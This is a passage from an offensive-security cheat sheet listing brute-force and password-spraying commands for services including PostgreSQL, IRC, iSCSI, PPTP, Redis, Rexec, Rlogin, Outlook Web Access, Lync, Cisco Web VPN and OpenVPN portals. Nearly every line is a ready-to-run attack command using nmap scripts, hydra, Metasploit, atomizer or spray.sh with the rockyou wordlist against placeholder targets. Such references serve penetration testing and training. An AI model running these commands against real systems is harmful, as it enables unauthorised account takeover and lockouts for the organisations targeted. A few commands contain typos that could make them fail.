## ------------------| Using Nmap
nmap -sV --script pgsql-brute --script-args userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt -p 5432 <IP>
04.18 IRC
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p <PORT> <IP>
04.19 ISCSI
nmap -sV --script iscsi-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p 3260 <IP>
04.20 PPTP
cat /usr/share/wordlists/rockyou.txt | thc-pptp-bruter –u <Username> <IP>
04.21 Redis
## ------------------| Using Nmap
nmap --script redis-brute -p 6379 <IP>
## ------------------| Using Hydra
hydra -u -f –P /usr/share/wordlists/rockyou.txt <IP> redis
## ------------------| Using MSF
use auxiliary/scanner/redis/redis_logi
04.22 Rexec
hydra -u -f -l -v -V <username> -P /usr/share/wordlists/rockyou.txt rexec://<Victim-IP>
04.23 Rlogin
hydra -v -V -u -f -l <username> -P /usr/share/wordlists/rockyou.txt rlogin://<Victim-IP>
04.24 OWA
## ------------------| Create Usernames List (the default is {f}{last})
python3 spindrift.py users.txt --target <IP> > newuserlist.txt
python3 spindrift.py users.txt --format "{f}.{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}.{last}" --target <IP> >> newuserlist.txts
python3 spindrift.py users.txt --format "{first}.{l}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{last}" --target <IP> >> newuserlist.txt
python3 spindrift.py users.txt --format "{first}{l}" --target <IP> >> newuserlist.txt
## ------------------| Bruteforce
python3 atomizer.py owa 10.10.10.210 'Passw0rd' newuserlist.txt --interval 0:00:01
python3 atomizer.py owa 10.10.10.210 /usr/share/seclists/Passwords/probable-v2-top207.txt newuserlist.txt --interval 0:00:01
## ------------------| Using Spray.sh
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -owa <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <RequestsFile>
04.25 Lync
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -lync <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
04.26 CISCO Web VPN
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -cisco <targetURL> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
04.27 OpenVPN Web Portal
wget https://raw.githubusercontent.com/Greenwolf/Spray/master/spray.sh
chmod +x spray.sh
./spray.sh -ovpn <targetIP> <targetPort> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes>
Last updated